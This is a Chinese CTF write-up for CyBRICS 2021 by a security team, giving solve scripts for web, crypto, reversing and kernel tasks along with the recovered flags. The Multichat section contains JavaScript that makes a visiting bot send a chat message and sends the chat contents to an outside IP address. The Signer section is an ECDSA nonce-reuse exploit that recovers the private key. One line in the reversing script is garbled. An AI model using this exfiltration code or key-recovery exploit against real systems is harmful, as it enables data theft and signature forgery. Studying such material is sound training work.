Web
Ad Network
根据要求重定向1337次即可,url在左上角的动图
import requests
a=requests.session()
a.max_redirects=1338
flag=a.get('http://adnetwork-cybrics2021.ctf.su/adnetwork')
print(flag.text)
Multichat
根据题目描述,向有管理员和技术支持的私密房间内发送特定的字符串,管理员将会在私密房间内把 flag 发出来。
在题目中发现了能够提交url并让技术支持点击url的地方http://multichat-cybrics2021.ctf.su:5000/
对原有的聊天室的 js 函数进行修改,直接进行 websocket 链接并发送Hey, i forgot the flag. Can you remind me?,在获取聊天室内容后,将聊天室内容通过 http 请求发送到自己的服务器上。将修改了的网页挂在自己的服务器上,此时若有人访问该页面,将直接往已连接的了聊天室发送特定的字符串并将聊天室的内容返回到我们自己的服务器上
function connect() {
if (window["WebSocket"]) {
conn = new WebSocket("ws://multichat-cybrics2021.ctf.su/ws");
conn.onclose = function (evt) {
var item = "";
if (evt.code === 1003) {
item = `Status: ${evt.reason}`;
} else {
item = "Connection closed.";
}
appendLog(item);
};
conn.onopen = function (evt) {
appendLog("Connected");
conn.send("Hey, i forgot the flag. Can you remind me?");
};
conn.onmessage = function (evt) {
appendLog(evt.data);
request.open('GET','http://120.55.164.48:1234/?a='+evt.data,true);
request.send();
};
} else {
appendLog("Your browser does not support WebSockets.");
}
}
window.onload = function () {
var room = getRandomInt(1000, 9999999999);
var msg = document.getElementById("msg");
var log = document.getElementById("log");
connect();
document.getElementById("form").onsubmit = function () {
if (!conn) {
return false;
}
if (!msg.value) {
return false;
}
conn.send(msg.value);
sended_message = msg.value;
msg.value = "";
return false;
};
document.getElementById("room").value = room;
}
把url发过去给技术点,查看服务器的访问记录直接拿flag
Misc
Scanner
游戏一共五关,最后一关得到二维码的 gif,PS 得到
cybrics{N0w_Y0u_4r3_4_c4sh13r_LOL}
CAPTCHA The Flag
使用 stegsolve 连续查看 25 张图中隐写的验证码,输入正确后即可获得 flag
cybrics{a_k33n_Ey3_wi11_sp0T_r1GhT_aw4Y}
Crypto
Signer
'''
@author: badmonkey
@software: PyCharm
@file: exp.py
@time: 2021/7/25 下午1:34
'''
from pwn import *
from ecdsa import ecdsa as ec
from Crypto.Util.number import *
from hashlib import md5
ip = "109.233.61.10"
port = 10105
context.log_level = "debug"
g = ec.generator_192
N = g.order()
sh = remote(ip,port)
sh.recvuntil(">")
sh.sendline("1")
r1,s1,h1 = eval(sh.recvall().strip())
sh.close()
sh = remote(ip,port)
sh.recvuntil(">")
sh.sendline("1")
r2,s2,h2 = eval(sh.recvall().strip())
sh.close()
k = ((h2-h1)*inverse(s2-s1,N))%N
x = (inverse(r1,N)*(k*s1-h1))%N
pub = ec.Public_key(g,g*x)
pri = ec.Private_key(pub,x)
sh = remote(ip,port)
sh.recvuntil(">")
sh.sendline("2")
payload = sh.recvline().strip()[-19:-2]
m = int(md5(payload).hexdigest(),16)
sig = pri.sign(m,2333)
sh.sendline("{},{}".format(sig.r,sig.s))
sh.interactive()
Reverse
listing
a1 = [0xd1,0xd3,0x76,0x23,0x35,0x61,0x9a,0xab]
b1 = [0x01,0x00,0x03,0x02,0x05,0x04,0x07,0x06]
c1 = [0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00]
h1 = 0
for i in range(8):
c1[i] = a1[b1[i]]
for i in range(8):
h1 += c1[i]<<(8*(7-i))
print(hex(h1 ^ 0xb0b045130550cafe))
a2 = [0xd5,0xd5,0x23,0x27,0x35,0x65,0x83,0xf8]
b2 = [0x09,0x08,0x0b,0x0a,0x0c,0x0d,0x0f,0x0e]
c2 = [0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00]
for i in range(8):
c2[i] = a2[b2[i]%0x8]
h2 = 0
for i in range(8):
h2 += c2[i]<<(8*(7-i))
print(hex(h2 ^ 0xb0b045130550cafe))
a3 = [0xc9,0xd3,0x61,0x27,0x33,0x6c,0x85,0xb9]
b3 = [0x11,0x10,0x13,0x12,0x15,0x14,0x17,0x16]
c3 = [0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00]
for i in range(8):
c3[i] = a3[b3[i]%0x10]
h3 = 0
for i in range(8):
h3 += c3[i]<<(8*(7-i))
print(hex(h3 ^ 0xb0b045130550cafe))
a4 = [0xd5,0xd6,0x22,0x71,0x31,0x61,0xcb,0xf8]
b4 = [0x19,0x18,0x1b,0x1a,0x1c,0x1d,0x1f,0x1e]
c4 = [0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00]
h4 = 0
for i in range(8):
c4[i] = a4[b4[i]%0x18]
for i in range(8):
h4 += c4[i]<<(8*(7-i))
print(hex(h4 ^ 0xb0b045130550cafe))
#[rdi] = {h3,h4,h1,h2}
from typing import *
from Crypto.Util.number import long_to_bytes
result = 'd1d3762335619aabd5d52327356583f8c9d36127336c85b9d5d622713161cbf8'
k1 = 'feca50051345b0b0feca50051345b0b0feca50051345b0b0feca50051345b0b0'
k2 = '010003020504070609080b0a0c0d0f0e111013121514171619181b1a1c1d1f1e'
def bigtolittle(s):
ss = []
for i in range(0, len(s), 2):
ss = 展开收缩] + ss
return ''.join(ss)
def rev(dest, src2):
dest_bin = bin(int(dest, 16))[2:].zfill(256)
src2_bin = bin(int(src2, 16))[2:].zfill(256)
src1 = [0] * 32
cnt = 0
src2_bin_f = src2_bin[:128]
src2_bin_b = src2_bin[128:]
dest_bin_f = dest_bin[:128]
dest_bin_b = dest_bin[128:]
for i in range(0, len(src2_bin_f), 8):
if src2_bin_f[i] == '0':
idx = int(src2_bin_f[4+i:4+i+4], 2)
src1[idx] = dest_bin_f[i:i+8]
else:
src1[idx] = '?' * 8
for i in range(0, len(src2_bin_b), 8):
if src2_bin_b[i] == '0':
idx = int(src2_bin_b[4+i:4+i+4], 2)
src1[idx + 16] = dest_bin_b[i:i+8]
else:
src1[idx] = '?' * 8
return ''.join(src1)
result = bigtolittle(result)
k1 = bigtolittle(k1)
k2 = bigtolittle(k2)
src1 = rev(result, k2)
print(src1)
rdi = int(k1, 16) ^ int(src1, 2)
#rdi = bigtolittle(rdi[2:])
print(long_to_bytes(rdi))
kernel
ssh 连接 dmp 下文件,发现只要满足异或即可
猜测文件位于对应 dev 目录下,构建代码如下:
#include<stdio.h>
#include<stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/time.h>
int main()
{
int fd = open("/dev/ioctl", 2);
char s[100]={0};
unsigned int val = 0x13373389;
struct timeval begin;
gettimeofday(&begin, NULL);
*(unsigned int*)s = val ^ (unsigned int)begin.tv_sec;
ioctl(fd, 0x5702, s);
puts(s);
}
编译为 elf 文件再将其 ssh 传输到对应目录下远程执行,即可获取 flag
end
招新小广告
ChaMd5 Venom 招收大佬入圈
新成立组IOT+工控+样本分析 长期招新
本文始发于微信公众号(ChaMd5安全团队):CyBRICS 2021-WriteUp
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论